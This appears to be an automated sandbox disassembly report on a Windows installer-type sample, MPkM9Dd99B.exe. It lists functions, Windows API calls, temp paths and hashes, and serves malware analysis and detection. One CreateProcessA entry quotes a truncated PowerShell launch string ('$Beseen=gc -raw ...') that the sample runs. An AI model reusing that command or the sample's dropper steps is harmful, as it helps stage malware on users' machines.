                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID:
                                • API String ID: 1375471231-0
                                • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                Function 00401EEA Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
                                • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                Function 00405926 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Beseen=gc -raw ',"$Beseen=gc -raw ',?,Bje gka",00000000), ref: 0040594F
                                • CloseHandle.KERNEL32(?), ref: 0040595C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID:
                                • API String ID: 3712363035-0
                                • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                                • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
                                Function 00401594 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(00010448), ref: 004015A6
                                • ShowWindow.USER32(00010442), ref: 004015BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                • Instruction ID: 6682d38faa1af99df36a0191d691bb63ef923b98cac77dddb2e5d8f8093f9b88
                                • Opcode Fuzzy Hash: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                • Instruction Fuzzy Hash: 5AE04F727001109FCF64DB94EEA086E73E6E794310360043FD102B3290C6749C068A68
                                Function 004066B5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                  • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                  • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                  • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID:
                                • API String ID: 2547128583-0
                                • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                Function 00405E20 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                Function 00405DFB Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                • Instruction ID: f779a6514c6a4e708396d8c5aab00734bb1243d63453d3b06c62658839fa2b1d
                                • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                • Instruction Fuzzy Hash: 20D0C9725056206BC2103B28EE0889BBB55DB542717028B35F9A9A22B0CB304C668B98
                                Function 004039BC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(FFFFFFFF,004037BF,?,?,00000008,0000000A,0000000C), ref: 004039C7
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsz930C.tmp\, xrefs: 004039DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\
                                • API String ID: 2962429428-3178380450
                                • Opcode ID: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                                • Instruction ID: afeb4de79f0a024d8aad6c8bb86ec84bc3369b341d6032a4bf43371fdf378432
                                • Opcode Fuzzy Hash: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                                • Instruction Fuzzy Hash: B1C0223020030066C0206F788E8F5483A045740339BA18336F0B8F04F1CB3C068C0D5D
                                Function 004058F1 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                                • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID:
                                • API String ID: 1375471231-0
                                • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                                • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                Function 0040168F Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                Download Yara Rule
                                APIs
                                • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileMove
                                • String ID:
                                • API String ID: 3562171763-0
                                • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                                • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                                Function 004023C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: PrivateProfileStringWrite
                                • String ID:
                                • API String ID: 390214022-0
                                • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                Function 00406141 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                Function 00401744 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401758
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: PathSearch
                                • String ID:
                                • API String ID: 2203818243-0
                                • Opcode ID: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                                • Instruction ID: 05024ed45ffdbec093a2934bfd596ec6e4c724010b47aa93efab37ffede3367c
                                • Opcode Fuzzy Hash: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                                • Instruction Fuzzy Hash: A5E0D871304100EFEB10CB649D48AAB3798DB10368B30453AE501A20C2D5B58946872C
                                Function 00405EC7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                Function 00405E98 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                Download Yara Rule
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                Function 0040240D Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                Memory Dump Source
